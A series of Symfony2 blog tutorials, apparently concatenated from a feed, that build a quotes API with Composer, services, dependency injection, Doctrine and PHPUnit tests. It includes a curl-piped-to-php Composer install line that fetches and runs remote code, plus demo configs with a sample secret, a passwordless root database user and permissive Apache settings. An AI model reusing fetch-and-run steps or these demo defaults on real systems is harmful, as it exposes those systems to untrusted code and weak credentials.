By setting a response in the event, the HttpKernel will almost stop (it
dispatches a kernel.response event and an extra kernel.finish_request event)
and return it.
By using stopPropagation, we prevent further kernel.request listeners from
being executed.
Have a look at HttpKernel::handleRaw to discover what's going on.
Let's run the tests one last time:
./vendor/bin/phpunit -c app
All green, we can commit our work:
git add -A
git ci -m 'Handled errors'
Events are a powerful way to extend the framework: you create a listener, register it on a specific event and you're done.
Kernel events aren't the only ones available: Doctrine provides its own, (it uses its own event dispatcher library) the Symfony2 Form Component uses them and we could even create our own events!
The only drawback is that they're sort of hidden: by looking at the controller's code we cannot know that submitted JSON has been handled, we lose explicitness.
The next article will be about annotations.
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fourth article of the series on mastering the Symfony2 framework. Have a look at the three first ones:
In the previous articles we created an API allowing us to submit and list quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── DependencyInjection
│ │ └── FortuneApplicationExtension.php
│ ├── Entity
│ │ ├── QuoteFactory.php
│ │ ├── QuoteGateway.php
│ │ ├── Quote.php
│ │ └── QuoteRepository.php
│ ├── FortuneApplicationBundle.php
│ ├── Resources
│ │ └── config
│ │ └── services.xml
│ └── Tests
│ ├── Controller
│ │ └── QuoteControllerTest.php
│ └── Entity
│ └── QuoteRepositoryTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one we'll use real database persistence using Doctrine ORM, a third party bundle, the command line console and a mocking library.
Note: Symfony2 isn't coupled to any ORM or database library. We could use anything else like PDO, Propel ORM, POMM, or anything you want!
Just like Symfony, Doctrine is composed of many libraries which can be used separately. The two main ones are:
DoctrineBundle registers the library's services into our Dependency Injection Container. It can be installed quickly:
composer require 'doctrine/doctrine-bundle:~1.2'
The bundle doesn't force you to use the ORM (you can simply use the DBAL), so we need to explicitly install it:
composer require 'doctrine/orm:~2.2,>=2.2.3'
The bundle has to be registered in our application:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Fortune\ApplicationBundle\FortuneApplicationBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
Its services depend on some configuration parameters, which we will add:
# File: app/config/config.yml
imports:
- { resource: parameters.yml }
- { resource: doctrine.yml }
framework:
secret: %secret%
router:
resource: %kernel.root_dir%/config/routing.yml
Next we create the actual configuration:
# File: app/config/doctrine.yml
doctrine:
dbal:
driver: pdo_mysql
host: 127.0.0.1
port: ~
dbname: %database_name%
user: %database_user%
password: %database_password%
charset: UTF8
orm:
auto_generate_proxy_classes: %kernel.debug%
auto_mapping: true
Note: the ~ value is equivalent to null in PHP.
The values surrounded by % will be replaced by parameters coming from the DIC.
For example, kernel.debug is set by the FrameworkBundle. We'll set the values
of the database ones in the following file:
# File: app/config/parameters.yml
parameters:
secret: hazuZRqYGdRrL8ATdB8kAqBZ
database_name: fortune
database_user: root
database_password: ~
For security reason, this file is not commited. You can update the distributed file though, so your team will know that they need to set a value:
# File: app/config/parameters.yml.dist
parameters:
secret: ChangeMePlease
database_name: fortune
database_user: root
database_password: ~
The first thing we need is to define the schema (tables with their fields), so we'll create this directory:
mkdir src/Fortune/ApplicationBundle/Resources/config/doctrine
And then the configuration file for the Quote entity:
# src/Fortune/ApplicationBundle/Resources/config/doctrine/Quote.orm.yml
Fortune\ApplicationBundle\Entity\Quote:
type: entity
repositoryClass: Fortune\ApplicationBundle\Entity\QuoteGateway
table: quote
id:
id:
type: integer
generator:
strategy: AUTO
fields:
content:
type: text
createdAt:
type: datetime
column: created_at
Note: Doctrine uses the word "Repository" with a different meaning than the Repository design pattern (the one with gateway and factory). In our case it corresponds to the gateway.
As you can see, we've added a createdAt attribute to our entity. Let's update
its code:
<?php
// File: src/Fortune/ApplicationBundle/Entity/Quote.php
namespace Fortune\ApplicationBundle\Entity;
class Quote
{
private $id;
private $content;
private $createdAt;
public function __construct($id, $content)
{
$this->id = $id;
$this->content = $content;
$this->createdAt = new \DateTime();
}
public static function fromContent($content)
{
return new Quote(null, $content);
}
public function getId()
{
return $this->id;
}
public function getContent()
{
return $this->content;
}
public function getCreatedAt()
{
return $this->createdAt;
}
}
Note: We've added a named constructor which will prove usefull with the gateway.
Symfony2 provides a powerful Console Component allowing you to create command line utilities. It can be used standalone, or in the full stack framework thanks to the FrameworkBundle. To create the console, we just need to create the following file:
#!/usr/bin/env php
<?php
// File: app/console
set_time_limit(0);
require_once __DIR__.'/../vendor/autoload.php';
require_once __DIR__.'/AppKernel.php';
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Input\ArgvInput;
$input = new ArgvInput();
$kernel = new AppKernel('dev', true);
$application = new Application($kernel);
$application->run($input);
The object ArgvInput contains the input given by the user (command name,
arguments and options). Bundles can register commands in the application by
fetching them from their Command directory.
We can now create the database and schema easily:
php app/console doctrine:database:create
php app/console doctrine:schema:create
Note: Those are useful when developing the application, but shouldn't be used in production.
Note: If you want to learn more about the Symfony2 Console Component, you can read this article.
Until now, our QuoteGateway was saving and retrieving the quotes from a file.
We'll update it to be a Doctrine Repository:
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteGateway.php
namespace Fortune\ApplicationBundle\Entity;
use Doctrine\ORM\EntityRepository;
class QuoteGateway extends EntityRepository
{
public function insert($content)
{
$entityManager = $this->getEntityManager();
$quote = Quote::fromContent($content);
$entityManager->persist($quote);
$entityManager->flush();
return $quote;
}
}
The EntityManager object does the actual persistence and will set the quote's
ID. The EntityRepository already has a findAll method, so we can remove it.
The last thing we need is to update the DIC's configuration:
<?xml version="1.0" ?>
<!-- File: src/Fortune/ApplicationBundle/Resources/config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="fortune_application.quote_factory"
class="Fortune\ApplicationBundle\Entity\QuoteFactory"
>
</service>
<service id="fortune_application.quote_gateway"
class="Fortune\ApplicationBundle\Entity\QuoteGateway"
factory-service="doctrine"
factory-method="getRepository">
<argument>FortuneApplicationBundle:Quote</argument>
</service>
<service id="fortune_application.quote_repository"
class="Fortune\ApplicationBundle\Entity\QuoteRepository"
>
<argument type="service" id="fortune_application.quote_gateway" />
<argument type="service" id="fortune_application.quote_factory" />
</service>
</services>
</container>
The doctrine service manages the Doctrine Repositories. To manually get a
repository you'd need to do somethig like
$container->get('doctrine')->getRepository('FortuneApplicationBundle:QuoteGateway'),
the factory-service and factory-method attributes allow us to simply call
container->get('fortune_application.quote_gateway')`.
Database operations can be slow however we want our tests to run as fast as possible: this is a good opportunity to use a test double.
PHPUnit comes with its own mocking library, but we'll use a less verbose and more one: Prophecy. First we install the PHPUnit integration of Prophecy:
composer require --dev 'phpspec/prophecy-phpunit:~1.0'
Then we update our test:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Entity/QuoteRepositoryTest.php
namespace Fortune\ApplicationBundle\Tests\Entity;
use Fortune\ApplicationBundle\Entity\Quote;
use Fortune\ApplicationBundle\Entity\QuoteFactory;
use Fortune\ApplicationBundle\Entity\QuoteGateway;
use Fortune\ApplicationBundle\Entity\QuoteRepository;
use Prophecy\PhpUnit\ProphecyTestCase;
class QuoteRepositoryTest extends ProphecyTestCase
{
const ID = 42;
const CONTENT = '<KnightOfNi> Ni!';
private $gateway;
private $repository;
public function setUp()
{
parent::setUp();
$gatewayClassname = 'Fortune\ApplicationBundle\Entity\QuoteGateway';
$this->gateway = $this->prophesize($gatewayClassname);
$factory = new QuoteFactory();
$this->repository = new QuoteRepository($this->gateway->reveal(), $factory);
}
public function testItPersistsTheQuote()
{
$quote = new Quote(self::ID, self::CONTENT);
$this->gateway->insert(self::CONTENT)->willReturn($quote);
$this->repository->insert(self::CONTENT);
$this->gateway->findAll()->willReturn(array($quote));
$quotes = $this->repository->findAll();
$foundQuote = $quotes['quotes'][self::ID];
$this->assertSame(self::CONTENT, $foundQuote['content']);
}
}
We created a mock of QuoteGateway which returns a quote we created beforehand.
Our changes are finished, let's run the tests:
./vendor/bin/phpunit -c app
No regression detected! We can commit our work:
git add -A
git ci -m 'Added doctrine'
Doctrine allows us to persist the data, its bundle integrates it smoothly into our application and provides us with handy command line tools.
You can have a look at Doctrine Migration, a standalone library allowing you to deploy database changes, it even has a bundle.
In the next article, we'll talk about how to extend the framework using events.
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the third article of the series on mastering the Symfony2 framework. Have a look at the two first ones:
In the previous articles we created an API allowing us to submit new quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── FortuneApplicationBundle.php
│ └── Tests
│ └── Controller
│ └── QuoteControllerTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one we'll list the existing quotes and learn about entities, services, the repository design pattern and dependency injection.
By the time we finished to implement the first User Story, Nostradamus (our customer and product owner) wrote the second one:
As a User
I want to be able to read the available quotes
In order to find interesting ones
Currently we don't persist our quotes, but now we will need to. However I'd like to dedicate a separate article to database persistence, so we will save our quotes in a file and concentrate on services.
Until now we wrote our code in the controller and it was ok, as there wasn't much code. But now our application will grow, so we need to put the code elsewhere: in the services.
Basically a service is just a class which does one thing (and does it well). They are stateless, which means that calling a method many times with the same parameter should always return the same value.
They manipulate entities which are classes representing the data. Those don't
have any behavior. Let's create the Entity directory:
mkdir src/Fortune/ApplicationBundle/Entity
And now we'll write the Quote entity:
<?php
// File: src/Fortune/ApplicationBundle/Entity/Quote.php
namespace Fortune\ApplicationBundle\Entity;
class Quote
{
private $id;
private $content;
public function __construct($id, $content)
{
$this->id = $id;
$this->content = $content;
}
public function getId()
{
return $this->id;
}
public function getContent()
{
return $this->content;
}
}
There's no need to write a unit test for it: it doesn't contain any logic. The tests of its services (which manipulate it) will be enough.
We'll create a persistence service which will follow the Repository design pattern: the repository calls a gateway to retreive some raw data and transforms it using a factory.
Before creating it, we will write a unit test which will help us to specify how it should work. Here's its directory:
mkdir src/Fortune/ApplicationBundle/Tests/Entity
And its code:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Entity/QuoteRepositoryTest.php
namespace Fortune\ApplicationBundle\Tests\Entity;
use Fortune\ApplicationBundle\Entity\QuoteFactory;
use Fortune\ApplicationBundle\Entity\QuoteGateway;
use Fortune\ApplicationBundle\Entity\QuoteRepository;
class QuoteRepositoryTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = '<KnightOfNi> Ni!';
private $repository;
public function setUp()
{
$filename = '/tmp/fortune_database_test.txt';
$gateway = new QuoteGateway($filename);
$factory = new QuoteFactory();
$this->repository = new QuoteRepository($gateway, $factory);
}
public function testItPersistsTheQuote()
{
$quote = $this->repository->insert(self::CONTENT);
$id = $quote['quote']['id'];
$quotes = $this->repository->findAll();
$foundQuote = $quotes['quotes'][$id];
$this->assertSame(self::CONTENT, $foundQuote['content']);
}
}
Now we can create the class which should make the test pass:
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteRepository.php
namespace Fortune\ApplicationBundle\Entity;
class QuoteRepository
{
private $gateway;
private $factory;
public function __construct(QuoteGateway $gateway, QuoteFactory $factory)
{
$this->gateway = $gateway;
$this->factory = $factory;
}
public function insert($content)
{
$quote = $this->gateway->insert($content);
return $this->factory->makeOne($quote);
}
public function findAll()
{
$quotes = $this->gateway->findAll();
return $this->factory->makeAll($quotes);
}
}
See what we've done in the constructor? That's dependency injection (passing arguments on which the class relies).
Note: for more information about the Dependency Injection, you can read this article.
The gateway is the class where the actual persistence is done:
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteGateway.php
namespace Fortune\ApplicationBundle\Entity;
class QuoteGateway
{
private $filename;
public function __construct($filename)
{
$this->filename = $filename;
}
public function insert($content)
{
$content = trim($content);
$line = $content."\n";
file_put_contents($this->filename, $line, FILE_APPEND);
$lines = file($this->filename);
$lineNumber = count($lines) - 1;
return new Quote($lineNumber, $content);
}
public function findAll()
{
$contents = file($this->filename);
foreach ($contents as $id => $content) {
$quotes[$id] = new Quote($id, trim($content));
}
return $quotes;
}
}
Wait a minute, we didn't write any test for this class! Well, that's because
QuoteRepositoryTest already covers it.
The factroy converts the object returned by the gateway to something usable by the controller (a JSONable array):
<?php
// File: src/Fortune/ApplicationBundle/Entity/QuoteFactory.php
namespace Fortune\ApplicationBundle\Entity;
class QuoteFactory
{
public function makeOne(Quote $rawQuote)
{
return array('quote' => $this->make($rawQuote));
}
public function makeAll(array $rawQuotes)
{
foreach ($rawQuotes as $rawQuote) {
$quotes['quotes'][$rawQuote->getId()] = $this->make($rawQuote);
}
return $quotes;
}
private function make(Quote $rawQuote)
{
return array(
'id' => $rawQuote->getId(),
'content' => $rawQuote->getContent(),
);
}
}
No unit test for this factory: the one for the repository already covers it. Now that the code is written, we can check that the test pass:
./vendor/bin/phpunit -c app
The controller responsibility is to retrieve the parameters from the request,
inject them in a service and then use its return value to create a response.
We won't construct directly the QuoteRepository service in the controller:
Symfony2 comes with a Dependency Injection Container (DIC).
In a nutshell when you ask the container a service, it will construct it for
you.
The first thing we need is to prepare the bundle by creating the following directories:
mkdir src/Fortune/ApplicationBundle/DependencyInjection
mkdir -p src/Fortune/ApplicationBundle/Resources/config
Then we need to create a class which will load the bundle's services into the DIC:
<?php
// File: src/Fortune/ApplicationBundle/DependencyInjection/FortuneApplicationExtension.php
namespace Fortune\ApplicationBundle\DependencyInjection;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\Config\FileLocator;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
class FortuneApplicationExtension extends Extension
{
public function load(array $configs, ContainerBuilder $container)
{
$fileLocator = new FileLocator(__DIR__.'/../Resources/config');
$loader = new XmlFileLoader($container, $fileLocator);
$loader->load('services.xml');
}
}
As you can see, we told the extension to look for a configuration file. Here it is:
<?xml version="1.0" ?>
<!-- File: src/Fortune/ApplicationBundle/Resources/config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="fortune_application.quote_factory"
class="Fortune\ApplicationBundle\Entity\QuoteFactory"
>
</service>
<service id="fortune_application.quote_gateway"
class="Fortune\ApplicationBundle\Entity\QuoteGateway"
>
<argument>/tmp/fortune_database.txt</argument>
</service>
<service id="fortune_application.quote_repository"
class="Fortune\ApplicationBundle\Entity\QuoteRepository"
>
<argument type="service" id="fortune_application.quote_gateway" />
<argument type="service" id="fortune_application.quote_factory" />
</service>
</services>
</container>
Now QuoteRepository is available in the controller:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
}
We can now make sure that everything is fine by running the tests:
./vendor/bin/phpunit -c app
Note: for more information about Symfony2 Dependency Injection Component you can read this article.
It's now time to fulfill the second user story, starting with a functional test:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Controller/QuoteControllerTest.php
namespace Fortune\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class QuoteControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), $headers, $content);
return $client->getResponse();
}
private function get($uri)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$client = static::createClient();
$client->request('GET', $uri, array(), array(), $headers);
return $client->getResponse();
}
public function testSubmitNewQuote()
{
$response = $this->post('/api/quotes', array('content' => '<KnightOfNi> Ni!'));
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode());
}
public function testSubmitEmptyQuote()
{
$response = $this->post('/api/quotes', array('content' => ''));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
public function testSubmitNoQuote()
{
$response = $this->post('/api/quotes', array());
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
public function testListingAllQuotes()
{
$response = $this->get('/api/quotes');
$this->assertSame(Response::HTTP_OK, $response->getStatusCode());
}
}
The next step is to update the configuration:
# File: app/config/routing.yml
submit_quote:
path: /api/quotes
methods:
- POST
defaults:
_controller: FortuneApplicationBundle:Quote:submit
list_quotes:
path: /api/quotes
methods:
- GET
defaults:
_controller: FortuneApplicationBundle:Quote:list
Then we write the action:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
public function listAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quotes = $quoteRepository->findAll();
return new JsonResponse($quotes, Response::HTTP_OK);
}
}
And finally we run the tests:
./vendor/bin/phpunit -c app
Everything is fine, we can commit:
git add -A
git ci -m 'Added listing of quotes'
Services is where the logic should be. Those manipulate entities, which carry the data. We used the repository design pattern which is very handy for APIs: it calls a gateway which retrieves raw data and then convert it using a factory, so the controller only needs to comunicate with the repository. Finally, we saw that "Dependency Injection" is just a fancy term for "passing arguments".
In the next article, we'll learn use database persistence, using Doctrine2 ORM.
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the second article of the series on mastering the Symfony2 framework. Have a look at the first one: Bootstraping.
In the first article we bootstraped our project with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ └── FortuneApplicationBundle.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one we'll implement the first User Story, by writing tests first.
Note: writing tests before writing any code is part of the Test Driven Development (TDD) methodology.
With the help of our Scrum Master, our Product Owner (Nostradamus) managed to write the following user story:
As a User
I want to be able to submit a new quote
In order to make it available
Our first reflex will be to write a functional test. First create the directory:
mkdir -p src/Fortune/ApplicationBundle/Tests/Controller
Then the test class:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Controller/QuoteControllerTest.php
namespace Fortune\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class QuoteControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), $headers, $content);
return $client->getResponse();
}
public function testSubmitNewQuote()
{
$response = $this->post('/api/quotes', array('content' => '<KnightOfNi> Ni!'));
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode());
}
}
Now we need to link the /quotes URL to a controller, so let's edit the
configuration:
# File: app/config/routing.yml
submit_quote:
path: /api/quotes
methods:
- POST
defaults:
_controller: FortuneApplicationBundle:Quote:submit
There wasn't any controllers until now, so we create the directory:
mkdir src/Fortune/ApplicationBundle/Controller
And finally the controller class:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
$answer['quote']['content'] = $postedValues['content'];
return new JsonResponse($answer, Response::HTTP_CREATED);
}
}
Now let's run our tests:
./vendor/bin/phpunit -c app
All green! This makes us confident enough to commit our work:
git add -A
git commit -m 'Created submission of quotes'
The submitted content shouldn't be empty. Let's add a test for the bad cases:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Controller/QuoteControllerTest.php
namespace Fortune\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class QuoteControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), $headers, $content);
return $client->getResponse();
}
public function testSubmitNewQuote()
{
$response = $this->post('/api/quotes', array('content' => '<KnightOfNi> Ni!'));
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode());
}
public function testSubmitEmptyQuote()
{
$response = $this->post('/api/quotes', array('content' => ''));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
public function testSubmitNoQuote()
{
$response = $this->post('/api/quotes', array());
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
}
Now let's fix the new tests:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$answer['quote']['content'] = $postedValues['content'];
return new JsonResponse($answer, Response::HTTP_CREATED);
}
}
Finally run the tests:
./vendor/bin/phpunit -c app
All green! Let's call it a day and commit our work:
git add -A
git commit -m 'Managed submission of empty/no quotes'
For those who didn't practice a lot with Symfony2, this article should have demonstrated how quick and simple it is to implement the first User Story (test and code alike).
In the next article, we'll learn how to work with services.
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
You know the basics of the Symfony2 framework (Composer, empty application, bundle, controller and functional test with PHPUnit) and you want to learn more about how to extend it (and understanding what you're doing)?
Then this series of articles is for you :) .
If you don't feel confident about the prerequisites, have a look at the Learn Symfony2 series. Don't worry, we'll start with a bit of practicing before starting to learn anything new.
In the first article of this series, we'll discover our cutomer's needs and we'll bootstrap our application.
In order to have real world examples, we'll need a use case. The Knight of Ni were pretty satisfied with our previous work, and they recommended us to Nostradamus!
Nostradamus is a fortune teller and wants to jump on the internet bandwagon. He wants us to create a fortune application where users can submit quotes.
Our first task will be to create an empty application so we can start working. We could use the Symfony Standard Edition, but in order to understand what really happens behind the scene we'll use an emptier distribution.
First make sure to have the last version of Composer installed:
curl -sS https://getcomposer.org/installer | php
sudo mv composer.phar /usr/local/bin/composer
Then ask Composer to create the boilerplate of our application, using the Symfony2 Emptier Edition:
composer create-project 'gnugat/sf2-emptier' fortune '0.1.*'
cd fortune
This distribution is similar to the empty application we created in the learn Symfony2 series. It contains the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── LICENSE
├── README.md
└── web
└── app.php
Remove the documentation files:
rm README.md LICENSE
Change the composer.json information:
{
"name": "nostradamus/fortune",
"license": "proprietary",
"type": "project",
"description": "A collection of quotes",
"autoload": {
"psr-4": { "": "src/" }
},
"require": {
"php": ">=5.3.17",
"symfony/symfony": "~2.4"
},
"require-dev": {
"phpunit/phpunit": "~4.1"
}
}
Next you'll have to configure the project specific parameters:
cp app/config/parameters.yml.dist app/config/parameters.yml
Don't forget to edit app/config/parameters.yml and change the value of the
secret parameter:
parameters:
secret: hazuZRqYGdRrL8ATdB8kAqBZ
Tip: Use random.org to generate your secret token.
Note: For security reason, this parameter file is ignored by git. It means that this file should be created on each installation.
Let's commit our hard work:
git init
git add -A
git add -f app/logs/.gitkeep app/cache/.gitkeep
git commit -m 'Created a Symfony2 Emptier application'
We will also need an Application bundle. First we create the directories:
mkdir -p src/Fortune/ApplicationBundle
Then the Bundle class:
<?php
// File: src/Fortune/ApplicationBundle/FortuneApplicationBundle.php
namespace Fortune\ApplicationBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class FortuneApplicationBundle extends Bundle
{
}
And finally register it in the application's kernel:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Fortune\ApplicationBundle\FortuneApplicationBundle(), // <-- Here!
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
We're now ready to get started with our real concern, so let's commit our work:
git add -A
git commit -m 'Created ApplicationBundle'
In order for your website to be browsed, you'll need to configure your web server. This configuration is well explained in the documentation, so here's a dump of an apache vhost:
<VirtualHost *:80>
ServerName fortune.local
DocumentRoot /home/loic.chardonnet/Projects/gnugat/fortune/web
ErrorLog "/home/loic.chardonnet/Projects/gnugat/fortune/app/logs/apache_errors.log"
CustomLog "/home/loic.chardonnet/Projects/gnugat/fortune/app/logs/apache_accesses.log" common
<Directory /home/loic.chardonnet/Projects/gnugat/fortune/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /app.php [QSA,L]
</IfModule>
</Directory>
</VirtualHost>
If you run into some permission problem (like writing in cache and logs),
you might consider to change APACHE_RUN_USER and APACHE_RUN_GROUP
environment variables present in /etc/apache2/envvars to your own user and
group.
Using Composer's create-project command with a Symfony2 Distribution is the
quickest way to bootstrap a project.
In the next article, we will start to work on our first User Story.
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the conclusion of the series on learning the Symfony2 framework. Have a look at the five first ones:
In the previous articles we created a tested application for the Knight of Ni with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Knight
│ └── ApplicationBundle
│ ├── Controller
│ │ └── ApiController.php
│ ├── KnightApplicationBundle.php
│ └── Tests
│ └── Controller
│ └── ApiControllerTest.php
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
This article will be like a cheat sheet of what we saw in the previous ones.
Composer will help you install and update third party libraries.
Download it once for all and install it in your global binaries:
curl -sS https://getcomposer.org/installer | php
sudo mv ./composer.phar /usr/local/bin/composer
It should then be executable like this: composer.
composer require [--dev] <vendor/name:version>composer installcomposer updateThe available third party libraries can be found on Packagist.
Here's an explanation of Composer version constraints by Igor.
In these articles, we create a project from scratch, but the recommended way of
starting a Symfony2 application is to use the Composer bootstrap command:
composer create-project <vendor/name> <path-to-install>
You could use the Symfony Standard Edition
(symfony/framework-standard-edition), or any other distribution.
